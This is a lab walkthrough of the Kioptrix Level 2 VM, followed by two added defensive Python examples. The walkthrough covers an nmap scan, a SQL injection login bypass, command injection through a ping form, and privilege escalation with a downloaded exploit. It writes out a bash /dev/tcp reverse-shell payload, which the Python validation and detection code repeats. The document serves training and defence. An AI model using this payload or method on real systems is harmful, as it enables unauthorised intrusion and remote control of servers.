Kioptrix updated – level2
First, we need to know which network we are on by finding our host IP address.
So we are on the 192.168.1.0 network with subnet mask 255.255.255.0 (192.168.1.0/24), and our Kali IP is 192.168.1.34.
Finding remote hosts and detecting the vulnerable target host:
Using nmap to scan for open ports and the services running on them.
Open ports are: 22, 80, 111, 443, 631 (IPP, the protocol for connecting to network printers), 844 and 3306.
Since port 80 is open alongside MySQL on port 3306, we can guess that there is a database-backed web page available.
Let's check for the classic basic SQL injection vulnerability:
DONE! We exploited the SQL injection vulnerability. But when the new web page appears (like below) there is no button for submitting data (POST/GET)! That is a bit strange. Let's find out how to work around this. 🙂
I used the Burp Suite community edition to capture and modify the request/response parameters sent to the web server.
Make sure Intercept is ON and click on "Open browser". Then enter the address of the web server, in this case: http://192.168.1.102
Now redo the SQL injection, this time through Burp Suite, and look at what parameters are passed between client and server.
Now, if we inspect the page, we can see that an HTML error causes the SUBMIT button to disappear. But we can still see the parameters that need to be passed to the web server and the PHP page that the FORM action points to: the "ip" parameter, the "submit" button and the pingit.php page.
In the above, we right-click on the packet received from 192.168.1.102 and choose "Send to Repeater" so that we can EDIT the request.
Below, we change the action PHP page and adjust our parameters. Then click the orange SEND button and look at the RESPONSE window. We got the result. BOOM!
Now, for simplicity, instead of sending every single packet through Burp Suite, we tell the server to establish a reverse shell back to our (attacker) system. Using the nc command we open port 444, listen on it and wait for the server to connect.
Enter the following command:
127.0.0.1;bash -i >& /dev/tcp/192.168.1.34/444 0>&1
Notice: for every single WHITE SPACE we put %20 and for the & sign we put %26 (the URL-encoded forms of those characters, since spaces and special characters must be sent by their corresponding codes).
We get a shell. But by issuing the id command we can see that our user (apache) does not have enough privileges. It is not ROOT yet.
We know the server is running CentOS 4.5.
A quick search on exploit-db gives us an exploit to escalate privileges.
We cannot use wget on the victim machine to reach the internet (it is not connected). So we download the exploit on the Kali system, start the apache2 web server on Kali, then download the exploit from Kali to the victim.
After the exploit is downloaded on Kali, we need to change to a directory on the victim where we have write permission (to compile and run the exploit), so we move to /tmp, download the exploit from Kali, compile it and run it.
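The reason the ping form can be turned into a shell is that the "ip" field is pasted into a shell command line as-is. The following is an added example, not code from the write-up or from the Kioptrix VM: it decodes the form body the way the server would (the %20 and %26 encoding described above), shows the flawed command construction as a string (nothing is executed), and then shows the two things a defender wants: a strict IP allow-list check that rejects the payload, and a small request-flagging routine for a WAF rule or access-log review. The body format (ip=...&submit=...) and the "ping -c 3" command shape are assumptions; the 192.168.1.34:444 values are the ones used in the walkthrough.

```python
"""Added example (not from the original write-up): how a ping form such as
pingit.php goes wrong, and how a defender validates its "ip" parameter.

Assumptions (hypothetical): the form posts ``ip=<value>&submit=submit``
URL-encoded, and the handler builds the shell line ``ping -c 3 <ip>``.
No command is executed here; the vulnerable path only renders the string.
"""
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed request body, encoded as the write-up describes
# (space -> %20, & -> %26).  The ';' is what turns a ping into a shell chain.
RAW_BODY = ("ip=127.0.0.1;bash%20-i%20>%26%20/dev/tcp/192.168.1.34/444%200>%261"
            "&submit=submit")

# Shell metacharacters that have no business in an IP address field.
SHELL_META = re.compile(r"[;&|`$()<>\n]")


def decode_ip_param(body: str) -> str:
    """Return the 'ip' parameter exactly as the server-side script receives it.
    Splits on '&' only, so the decoded '&' inside the value survives."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "ip":
            return unquote_plus(value)
    return ""


def vulnerable_command(ip: str) -> str:
    """The flawed construction: raw user input concatenated into a shell line.
    Returned as a string only, never executed."""
    return "ping -c 3 " + ip


def validate_ip(value: str) -> str:
    """Strict allow-list check: the field must be one IP literal and nothing
    else.  Raises ValueError for anything that does not parse as an address."""
    value = value.strip()
    ipaddress.ip_address(value)
    return value


def safe_command(ip: str) -> list:
    """Hardened construction: the validated value becomes a single argv element,
    so no shell ever parses it (pass this list to subprocess.run in real code)."""
    return ["ping", "-c", "3", validate_ip(ip)]


def flag_request(body: str) -> list:
    """Detection view: reasons a request to the ping form looks like command
    injection.  Empty list means the request looks like a normal ping."""
    ip = decode_ip_param(body)
    reasons = []
    if SHELL_META.search(ip):
        reasons.append("shell metacharacter in ip parameter")
    if "/dev/tcp/" in ip:
        reasons.append("bash /dev/tcp reverse-shell idiom")
    try:
        ipaddress.ip_address(ip.strip())
    except ValueError:
        reasons.append("ip parameter is not a single IP literal")
    return reasons


if __name__ == "__main__":
    ip = decode_ip_param(RAW_BODY)
    print("server sees ip  :", repr(ip))
    print("vulnerable line :", vulnerable_command(ip))
    print("flags           :", flag_request(RAW_BODY))
    try:
        safe_command(ip)
    except ValueError as exc:
        print("hardened path rejects input:", exc)
    print("hardened path accepts 127.0.0.1:", safe_command("127.0.0.1"))
```

The validation deliberately uses an allow-list (parse as an IP address) rather than stripping characters like ";": a deny-list misses the next metacharacter, while anything that does not parse as an address simply never reaches the command. Passing argv as a list removes the shell from the path entirely, so even a value that slipped past validation could not be chained into a second command.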
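Seen from the server side, the sequence just described (the apache account getting an interactive shell, fetching a file over HTTP into /tmp, compiling it and executing it from there) is a recognisable chain, and each step is visible in process-execution telemetry. The block below is an added example, not part of the original write-up: it runs a few simple rules over constructed process records and correlates them per account. The record format (user=... parent=... cmd=... cwd=...) is my own simplified layout, not auditd or any specific EDR output, and the file name exploit.c is a placeholder since the write-up does not name the exploit used.

```python
"""Added example (not from the original write-up): flagging the
web-account -> shell -> download -> compile -> run chain in process records.

The record format below is an assumption made for this example, not a real
audit log layout.  Field values are constructed from the walkthrough; the
file name exploit.c is a placeholder.
"""
import os
import re

WEB_ACCOUNTS = {"apache", "www-data", "nobody"}
DOWNLOADERS = {"wget", "curl", "ftp", "tftp"}
COMPILERS = {"gcc", "cc", "g++", "make"}
LINE_RE = re.compile(r"^user=(\S+) parent=(\S+) cmd=(.*) cwd=(\S+)$")

# Constructed process records (not real log output).
EVENTS = [
    "user=apache parent=httpd cmd=/bin/sh -c ping -c 3 127.0.0.1;bash -i >& /dev/tcp/192.168.1.34/444 0>&1 cwd=/var/www/html",
    "user=apache parent=sh cmd=bash -i cwd=/var/www/html",
    "user=apache parent=bash cmd=id cwd=/var/www/html",
    "user=apache parent=bash cmd=wget http://192.168.1.34/exploit.c cwd=/tmp",
    "user=apache parent=bash cmd=gcc exploit.c -o exploit cwd=/tmp",
    "user=apache parent=bash cmd=./exploit cwd=/tmp",
    "user=root parent=cron cmd=/usr/sbin/logrotate /etc/logrotate.conf cwd=/",
    "user=apache parent=httpd cmd=/bin/sh -c ping -c 3 192.168.1.1 cwd=/var/www/html",
]


def parse_event(line: str) -> dict:
    """Split one record into fields; 'tool' is the basename of the program run."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unparsable event: " + line)
    user, parent, cmd, cwd = m.groups()
    argv0 = cmd.split()[0] if cmd.split() else ""
    return {"user": user, "parent": parent, "cmd": cmd, "cwd": cwd,
            "argv0": argv0, "tool": os.path.basename(argv0)}


def rule_reverse_shell(ev: dict) -> bool:
    """Interactive shell or the bash /dev/tcp idiom under a web account."""
    return "/dev/tcp/" in ev["cmd"] or re.search(r"\b(ba)?sh -i\b", ev["cmd"]) is not None


def rule_download_to_tmp(ev: dict) -> bool:
    """Download tool run with /tmp as working directory."""
    return ev["tool"] in DOWNLOADERS and ev["cwd"].startswith("/tmp")


def rule_compiler(ev: dict) -> bool:
    """Web service accounts have no reason to compile anything."""
    return ev["tool"] in COMPILERS


def rule_exec_from_tmp(ev: dict) -> bool:
    """A binary launched from /tmp, by absolute or relative path."""
    return ev["argv0"].startswith("/tmp/") or (
        ev["argv0"].startswith("./") and ev["cwd"].startswith("/tmp"))


RULES = [
    ("reverse shell launched by web-server account", rule_reverse_shell),
    ("download tool run from /tmp by web-server account", rule_download_to_tmp),
    ("compiler invoked by web-server account", rule_compiler),
    ("execution from /tmp by web-server account", rule_exec_from_tmp),
]


def analyse(lines: list) -> list:
    """Return (record index, rule name) for every rule hit on a web account."""
    hits = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        if ev["user"] not in WEB_ACCOUNTS:
            continue
        for name, rule in RULES:
            if rule(ev):
                hits.append((i, name))
    return hits


def escalation_suspected(hits: list, threshold: int = 3) -> bool:
    """One hit is noise; several distinct stages of the chain are not."""
    return len({name for _, name in hits}) >= threshold


if __name__ == "__main__":
    found = analyse(EVENTS)
    for idx, name in found:
        print(f"[{idx}] {name}: {EVENTS[idx]}")
    print("privilege-escalation chain suspected:", escalation_suspected(found))
```

The benign ping on the last record is not flagged, which is the point of correlating stages rather than alerting on "httpd spawned sh" alone. The mitigations these rules point at are the usual ones: a noexec, separately mounted /tmp, no compiler on a production web host, and an egress policy that stops the web server account from opening outbound connections such as the one to port 444.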